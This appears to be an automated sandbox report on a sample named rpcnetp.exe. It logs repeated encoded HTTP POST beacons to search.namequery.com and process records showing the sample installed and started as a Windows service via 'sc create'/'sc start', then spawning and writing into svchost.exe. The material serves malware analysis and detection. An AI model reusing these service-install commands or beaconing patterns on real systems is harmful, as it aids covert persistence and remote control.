Oct 7, 2021 21:25:48.111125946 CEST	2677	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 24 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 44 40 97 78 dd 7d 5e 07 ee 04 00 e0 f5 44 fd 6f 72 18 7e Data Ascii: ~` D@x}^Dor~
Oct 7, 2021 21:25:48.275963068 CEST	2677	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 29 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e f1 17 2b 67 6a 62 80 94 ba ca 33 28 56 af a4 c3 03 56 21 d7 f5 18 7f ee fa 7e 0d 0a Data Ascii: ~+gjb3(VV!~
Oct 7, 2021 21:25:48.279582024 CEST	2678	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 88 54 87 a6 44 40 97 78 04 00 1b db a9 15 78 0c a8 7e Data Ascii: ~` TD@xx~
Oct 7, 2021 21:25:48.445363045 CEST	2678	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 29 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e bb a5 c6 0e e0 0d 8f 50 e4 b2 cd 86 81 0d 60 1f 62 84 54 03 3b 61 08 3f 07 7e 0d 0a Data Ascii: ~P`bT;a?~
Oct 7, 2021 21:25:48.447550058 CEST	2678	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 4c e2 7c b5 88 54 87 a6 04 00 fd 7f a4 07 09 af 5b 7e Data Ascii: ~` L\|T[~
Oct 7, 2021 21:25:48.612135887 CEST	2678	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 18 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 23 62 96 38 98 7d 5d 68 68 23 d5 19 dc 93 7e 0d 0a Data Ascii: ~#b8}]hh#~
Oct 7, 2021 21:25:48.614590883 CEST	2679	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 b7 28 e1 b6 4c e2 7c b5 04 00 3e 6d 09 db 1a af 82 7e Data Ascii: ~` (L\|>m~
Oct 7, 2021 21:25:48.780464888 CEST	2679	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 18 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 9f ad e9 5a 2d ce fa 8c da ff be 2a 8f e5 7e 0d 0a Data Ascii: ~Z-*~
Oct 7, 2021 21:25:48.783839941 CEST	2679	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 b1 6d 17 00 b7 28 e1 b6 04 00 b6 86 3d a6 2b 1c 89 7e Data Ascii: ~` m(=+~
Oct 7, 2021 21:25:48.950016022 CEST	2679	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 17 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e a5 16 ae cc a2 2f 36 05 56 8e 3b 47 20 7e 0d 0a Data Ascii: ~/6V;G ~
Oct 7, 2021 21:25:48.952986956 CEST	2680	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 74 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 56 5c ab 7d 31 b1 6d 17 00 36 00 bf 48 62 94 bb f9 81 74 54 55 a9 bf 56 32 29 cd 3e b9 76 b7 29 ab 3d f4 0c cb ef 3e 34 90 a9 09 6f c0 4b 9c ff 91 3f 26 ff 58 95 a9 39 18 70 57 e2 21 d5 02 bf fd 3c 82 af 7e Data Ascii: ~` V\}1m6HbtTUV2)>v)=>4oK?&X9pW!<~
Oct 7, 2021 21:25:49.117723942 CEST	2680	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 17 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 24 ab 74 12 c8 45 f6 07 cd d7 4c 56 af 7e 0d 0a Data Ascii: ~$tELV~
Oct 7, 2021 21:25:49.120628119 CEST	2680	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 75 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 26 aa 47 e0 56 5c ab 7d 31 36 00 8b 0f 61 46 67 86 93 29 e7 ed fa 76 75 3e 2e 6c 0a 07 41 29 f7 3a d9 59 df ee 7d 33 d1 4a b3 56 1a 71 02 41 3a f8 bd 4b e9 0f 72 5e 6d 96 c9 e7 df 5d 40 bc 73 22 1a 4d 12 f7 7e Data Ascii: ~` &GV\}16aFg)vu>.lA):Y}3JVqA:Kr^m]@s"M~
Oct 7, 2021 21:25:49.287314892 CEST	2681	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 17 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 0e 18 1c d3 ee b1 7f be 4e 6d 5d da c8 7e 0d 0a Data Ascii: ~Nm]~
Oct 7, 2021 21:25:49.289769888 CEST	2681	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 74 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 58 af 9e 22 26 aa 47 e0 36 00 bf f5 d9 0b 2f f9 b5 bd 50 1a 1d 33 36 89 9f 89 d8 24 34 26 d3 5e dd 6c 16 89 b0 3b 38 32 8e 20 a5 96 80 ef a7 3c 59 74 4a 21 05 5a e3 37 a0 26 21 ad e0 bb 58 81 5e 7d 33 cd 7e Data Ascii: ~` X"&G6/P36$4&^l;82 <YtJ!Z7&!X^}3~
Oct 7, 2021 21:25:49.455056906 CEST	2681	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 17 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 2e 57 84 58 ed b5 9d 57 79 89 6e f6 c6 7e 0d 0a Data Ascii: ~.WXWyn~
Oct 7, 2021 21:25:49.459754944 CEST	2682	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 75 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 63 e2 18 12 58 af 9e 22 36 00 ed 31 18 cd a3 4e 39 fa 5f 57 7d 5d 62 c4 3c 52 51 48 48 06 88 56 f9 82 87 8f ce 59 41 c7 7d 5e 73 b4 48 18 43 ca a9 7a 84 48 59 4b ee 3f e2 51 61 72 18 55 3f 29 b4 7f 6f cd 84 7e Data Ascii: ~` cX"61N9_W}]b<RQHHVYA}^sHCzHYK?QarU?)o~
Oct 7, 2021 21:25:49.626085043 CEST	2682	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 17 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 30 dc 60 6a a1 68 1f 7f 93 cd 7f e8 75 7e 0d 0a Data Ascii: ~0`jhu~
Oct 7, 2021 21:25:49.630515099 CEST	2682	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 25 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 29 ca 4a 6e 63 e2 18 12 06 00 6c fd 4c 93 9a 45 78 96 fa 7e Data Ascii: ~` )JnclLEx~
Oct 7, 2021 21:25:49.795301914 CEST	2682	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 18 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 96 64 35 be 1f 4b 59 a6 34 86 08 20 7d 31 7e 0d 0a Data Ascii: ~d5KY4 }1~
Oct 7, 2021 21:25:49.801758051 CEST	2683	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 b9 90 01 87 29 ca 4a 6e 04 00 c7 bc 52 67 09 e5 ab 7e Data Ascii: ~` )JnRg~
Oct 7, 2021 21:25:49.966474056 CEST	2683	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 18 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 7f ba 53 14 de 3e c6 12 a6 7d 31 19 96 28 7e 0d 0a Data Ascii: ~S>}1(~
Oct 7, 2021 21:25:49.969285965 CEST	2683	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 9a 8c 84 db b9 90 01 87 04 00 66 59 79 22 1a 80 ef 7e Data Ascii: ~` fYy"~
Oct 7, 2021 21:25:50.134128094 CEST	2684	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 18 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 38 f7 34 98 0b 46 4f 6f 64 cc 6c 2a ee 4a 7e 0d 0a Data Ascii: ~84FOodl*J~
Oct 7, 2021 21:25:50.136079073 CEST	2684	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 83 7c e2 57 9a 8c 84 db 04 00 ba f8 1c 95 2b 66 96 7e Data Ascii: ~` \|W+f~
Oct 7, 2021 21:25:50.306108952 CEST	2684	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 18 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 9f 74 6e 78 e0 27 3b 9b 4a 8f df 3b 26 ad 7e 0d 0a Data Ascii: ~tnx';J;&~
Oct 7, 2021 21:25:50.308320999 CEST	2684	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 01 8a 01 94 83 7c e2 57 04 00 4e 31 80 e9 3c a2 ed 7e Data Ascii: ~` \|WN1<~
Oct 7, 2021 21:25:50.473535061 CEST	2685	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 19 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e ab 5d 65 d5 98 68 f4 c5 7b 7d 5e 5c 4c 89 33 7e 0d 0a Data Ascii: ~]eh{}^\L3~
Oct 7, 2021 21:25:50.476890087 CEST	2685	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 32 ec 6f 08 01 8a 01 94 04 00 b7 27 00 5b 4d 19 36 7e Data Ascii: ~` 2o'[M6~
Oct 7, 2021 21:25:50.641959906 CEST	2685	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 18 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 1b ea 4e 95 e3 3e 94 5a c4 b0 2d 5d a8 a9 7e 0d 0a Data Ascii: ~N>Z-]~
Oct 7, 2021 21:25:50.646055937 CEST	2686	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 24 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 91 d5 a3 2c 32 ec 6f 08 04 00 bf 41 1e ce 5e 7d 5e 59 7e Data Ascii: ~` ,2oA^}^Y~
Oct 7, 2021 21:25:50.810699940 CEST	2686	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 18 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e a5 4c 82 47 77 7d 5e d8 65 89 ad 6e bc 64 7e 0d 0a Data Ascii: ~LGw}^end~
Oct 7, 2021 21:25:50.813941956 CEST	2686	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 73 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 eb c4 fd 73 91 d5 a3 2c 36 00 1a 9c aa 55 ec c2 1d c7 e5 29 4e 30 77 2a 94 8f f2 a3 09 c7 f8 98 e7 9f 05 36 a8 47 0a 70 4a 2b ac ff 5e 73 c2 56 0e 92 5e 4a 18 09 f9 9e 75 aa 3e f5 5a 84 5b 19 6f d8 2e 7e Data Ascii: ~` s,6U)N0w*6GpJ+^sV^Ju>Z[o.~
Oct 7, 2021 21:25:50.978565931 CEST	2686	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 23 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 38 07 f2 64 0e ea 99 ae 90 23 0f 5a a8 9c 5f 66 7f 7a 6b 7e 0d 0a Data Ascii: ~8d#Z_fzk~
Oct 7, 2021 21:25:50.982218981 CEST	2687	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 40 fc cc 0f eb c4 fd 73 04 00 2e 16 63 8e 78 96 93 7e Data Ascii: ~` @s.cx~
Oct 7, 2021 21:25:51.147799969 CEST	2687	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 18 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e f6 16 e1 c9 c6 fc a9 e1 3c c1 b7 08 d9 47 7e 0d 0a Data Ascii: ~<G~
Oct 7, 2021 21:25:51.150238991 CEST	2687	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 bb 46 d2 71 40 fc cc 0f 04 00 8c 64 a2 89 09 6f c8 7e Data Ascii: ~` Fq@do~
Oct 7, 2021 21:25:51.314759016 CEST	2688	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 17 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 1b 69 da a4 bf 72 69 c0 97 a5 19 1c a6 7e 0d 0a Data Ascii: ~iri~
Oct 7, 2021 21:25:51.317600965 CEST	2688	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 aa 66 c1 35 bb 46 d2 71 04 00 ac a6 8a ab 1a 1b 8b 7e Data Ascii: ~` f5Fq~
Oct 7, 2021 21:25:51.482516050 CEST	2688	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 17 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 93 78 7b 43 dd e7 4f 4c b0 6d 2a 1b e1 7e 0d 0a Data Ascii: ~x{COLm*~
Oct 7, 2021 21:25:51.486161947 CEST	2688	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 f1 49 9c 97 aa 66 c1 35 04 00 65 fe 34 e4 2b fe ed 7e Data Ascii: ~` If5e4+~
Oct 7, 2021 21:25:51.651395082 CEST	2689	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 30 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 7d 31 af 1f cb 41 bd b0 6d 8f 4e ee c3 e1 8c 0f c3 ef 7b f9 d6 3f fc 3b be 31 7e 0d 0a Data Ascii: ~}1AmN{?;1~
Oct 7, 2021 21:25:51.654524088 CEST	2689	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 a1 ab 57 42 f1 49 9c 97 04 00 2b 9a 89 dc 3c 08 e1 7e Data Ascii: ~` WBI+<~
Oct 7, 2021 21:25:51.820671082 CEST	2689	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 29 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 8c eb 5b 1a f3 ba f2 61 9d 63 cf 99 0f 0e e4 e8 fa e6 34 bf e7 30 4c 5e 58 7e 0d 0a Data Ascii: ~[ac40L^X~
Oct 7, 2021 21:25:51.827167988 CEST	2690	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 23 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 ac 14 1a 98 a1 ab 57 42 04 00 78 e0 64 ea 4d c9 67 7e Data Ascii: ~` WBxdMg~
Oct 7, 2021 21:25:51.991864920 CEST	2690	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 18 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e d7 73 8b 5f 7d 31 29 f4 49 94 fe 5d b0 3a 7e 0d 0a Data Ascii: ~s_}1)I]:~
Oct 7, 2021 21:25:51.995599031 CEST	2690	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 283 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 fe 6b d1 e4 ac 14 1a 98 04 01 57 ae 27 37 ec 7b 2e c1 a6 ab 21 bc 35 e3 5f 14 b6 ef 36 59 67 02 8c 45 ed 3f 85 89 40 53 89 cb 87 87 6e 7a a6 7a 46 e8 05 c9 7d 31 e9 89 1a 5c 37 75 cc 1c 6e e5 be 86 9b 4f d4 a8 77 bf ac 97 2d 31 56 82 ac 0e bd c9 80 d5 8f ab dc 7d 33 db d7 01 71 19 c2 d8 a0 b2 9a 9e bd 94 74 33 26 9e e1 02 4f 87 6e ef 7d 5e 22 9e 80 7b 39 ba 76 2a 2b 71 2e e1 eb 6b 2c e1 d1 8d ff 03 43 ab ee b4 12 17 4b b0 5b c6 b4 a6 47 ab f9 be de 7c f0 c1 fb 6a e0 6d 58 b3 c7 58 93 95 c0 f5 32 85 fd df 1b 94 c1 6e 5b d1 f3 56 91 c8 e4 31 07 e0 f1 de 62 63 fe 69 54 71 66 33 00 1d 0f 5b 86 18 75 6c b0 4b e2 92 e8 32 76 f8 25 68 c2 79 7c 9c 55 1d 4a 3d e1 94 da b2 5f 1e 0b 77 f8 4d 58 df b7 10 64 b2 18 a8 08 f5 d5 ae 4d 5d 91 f4 98 9d 87 59 7a 17 93 71 f9 17 f3 cb 3c 6e a0 4b 3f 07 30 c6 7d 5d d0 a9 5a fb cb 47 5e 25 1a 7e Data Ascii: ~` kW'7{.!5_6YgE?@SnzzF}1\7unOw-1V}3qt3&On}^"{9v*+q.k,CK[G\|jmXX2n[V1bciTqf3[ulK2v%hy\|UJ=_wMXdM]Yzq<nK?0}]ZG^%~
Oct 7, 2021 21:25:52.162159920 CEST	2691	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 63 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e 54 27 5b ef 0c eb a2 19 4e 8c 82 04 81 37 a5 97 dc 59 08 ae b5 e7 25 1d 8a 89 f9 49 ab 7d 31 42 21 e2 70 53 7d 5e c3 7a 30 5d b7 6c 86 80 77 47 61 38 2b a2 3a 42 69 22 6e 94 27 7e 0d 0a Data Ascii: ~T'[N7Y%I}1B!pS}^z0]lwGa8+:Bi"n'~
Oct 7, 2021 21:25:52.169229031 CEST	2691	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 24 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 51 7d 31 1d bd fe 6b d1 e4 04 00 97 9a fb 2b 6f b4 af 7e Data Ascii: ~` Q}1k+o~
Oct 7, 2021 21:25:52.333781004 CEST	2691	IN	HTTP/1.1 200 OK Server: 3.288.2.1 Content-Type: image/jpeg Content-Length: 29 Connection: Keep-Alive TagId: -2145705888 Data Raw: 7e aa 56 e7 fd d2 6a d7 d3 1a 20 ab 07 d7 90 e4 e6 bf 78 c7 33 1d cf 7f 1f df 7e 0d 0a Data Ascii: ~Vj x3~
Oct 7, 2021 21:25:52.339021921 CEST	2692	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;) Host: search.namequery.com Connection: Keep-Alive Cache-Control: no-cache Content-Length: 24 TagId: -2145705888 Data Raw: 7e 60 20 1b 80 97 79 e1 0d 51 7d 31 1d bd 04 00 1f 3b 44 c0 78 8c 14 7e Data Ascii: ~` yQ}1;Dx~

Code Manipulations

Statistics

CPU Usage

• cmd.exe
• conhost.exe
• sc.exe
• cmd.exe
• conhost.exe
• sc.exe
• rpcnetp.exe
• svchost.exe
• iexplore.exe
• svchost.exe

Click to jump to process

Memory Usage

• cmd.exe
• conhost.exe
• sc.exe
• cmd.exe
• conhost.exe
• sc.exe
• rpcnetp.exe
• svchost.exe
• iexplore.exe
• svchost.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Behavior

• cmd.exe
• conhost.exe
• sc.exe
• cmd.exe
• conhost.exe
• sc.exe
• rpcnetp.exe
• svchost.exe
• iexplore.exe
• svchost.exe

Click to jump to process

System Behavior

Analysis Process: cmd.exe PID: 6932 Parent PID: 1004

Function Logs

General

Start time:	21:23:35
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe' >> C:\servicereg.log 2>&1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

File Opened

File Created

File Attributes Queried

Show Windows behavior

Section Activities

Sections loaded by Windows

Show Windows behavior

Process Activities

Process Created

Process Information Set

Show Windows behavior

Thread Activities

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

Show Windows behavior

LPC Port Activities

Chronological Activities

Analysis Process: conhost.exe PID: 6952 Parent PID: 6932

Function Logs

General

Start time:	21:23:36
Start date:	07/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

File Attributes Queried

Volume Information Queried

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Show Windows behavior

Mutex Activities

Mutex Created

Show Windows behavior

Process Activities

Show Windows behavior

Thread Activities

Thread Created

Thread Delayed

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

Show Windows behavior

Windows UI Activities

Window Created

Window UI Enumerated

Message Posted to Windows UI

Window UIs Event Hook Set

Show Windows behavior

LPC Port Activities

Chronological Activities

Analysis Process: sc.exe PID: 6984 Parent PID: 6932

Function Logs

General

Start time:	21:23:37
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc create EcVoz binpath= 'C:\Users\user\Desktop\rpcnetp.exe'
Imagebase:	0x10e0000
File size:	60928 bytes
MD5 hash:	24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

File Written

Show Windows behavior

Section Activities

System Activities

Chronological Activities

Analysis Process: cmd.exe PID: 7016 Parent PID: 1004

Function Logs

General

Start time:	21:23:38
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c sc start EcVoz >> C:\servicestart.log 2>&1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

File Opened

File Created

File Attributes Queried

Show Windows behavior

Section Activities

Sections loaded by Windows

Show Windows behavior

Process Activities

Process Created

Process Information Set

Show Windows behavior

Thread Activities

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

Show Windows behavior

LPC Port Activities

Chronological Activities

Analysis Process: conhost.exe PID: 7024 Parent PID: 7016

Function Logs

General

Start time:	21:23:38
Start date:	07/10/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

File Attributes Queried

Volume Information Queried

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Show Windows behavior

Mutex Activities

Mutex Created

Show Windows behavior

Process Activities

Show Windows behavior

Thread Activities

Thread Created

Thread Delayed

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

Show Windows behavior

Windows UI Activities

Window Created

Window UI Enumerated

Message Posted to Windows UI

Window UIs Event Hook Set

Show Windows behavior

LPC Port Activities

Chronological Activities

Analysis Process: sc.exe PID: 7056 Parent PID: 7016

Function Logs

General

Start time:	21:23:38
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc start EcVoz
Imagebase:	0x10e0000
File size:	60928 bytes
MD5 hash:	24A3E2603E63BCB9695A2935D3B24695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rpcnetp.exe PID: 7072 Parent PID: 568

Function Logs

General

Start time:	21:23:39
Start date:	07/10/2021
Path:	C:\Users\user\Desktop\rpcnetp.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\rpcnetp.exe
Imagebase:	0xa10000
File size:	22932 bytes
MD5 hash:	57BD3200910A8D2C85B1927B27123A6B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

File Activities

File Opened

File Created

File Written

Other File Operations

Show Windows behavior

Section Activities

Sections loaded by Windows

Sections loaded by Program

Show Windows behavior

Registry Activities

Key Opened

Show Windows behavior

Mutex Activities

Show Windows behavior

Process Activities

Process Created

Show Windows behavior

Thread Activities

Thread Created

Show Windows behavior

Memory Activities

Memory Written

Memory Allocated

Memory Usage Statistics

Show Windows behavior

System Activities

Show Windows behavior

Timing Activities

User Timer set

Show Windows behavior

Windows UI Activities

Window Created

Show Windows behavior

LPC Port Activities

Chronological Activities

Analysis Process: svchost.exe PID: 7116 Parent PID: 7072

Function Logs

General

Start time:	21:23:39
Start date:	07/10/2021
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\svchost.exe
Imagebase:	0x13b0000
File size:	44520 bytes
MD5 hash:	FA6C268A5B5BDA067A901764D203D433
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

File Activities

Show Windows behavior

Section Activities

Sections loaded by Windows

Show Windows behavior

Registry Activities

Key Opened

Key Value Queried

Show Windows behavior

Mutex Activities

Show Windows behavior

Process Activities

Show Windows behavior

Thread Activities

Thread Created

Thread Information Set

Show Windows behavior

Memory Activities

Memory Read

Memory Written

Memory Allocated

Memory Usage Statistics

Show Windows behavior

System Activities

System Information Queried

Show Windows behavior

LPC Port Activities

Chronological Activities

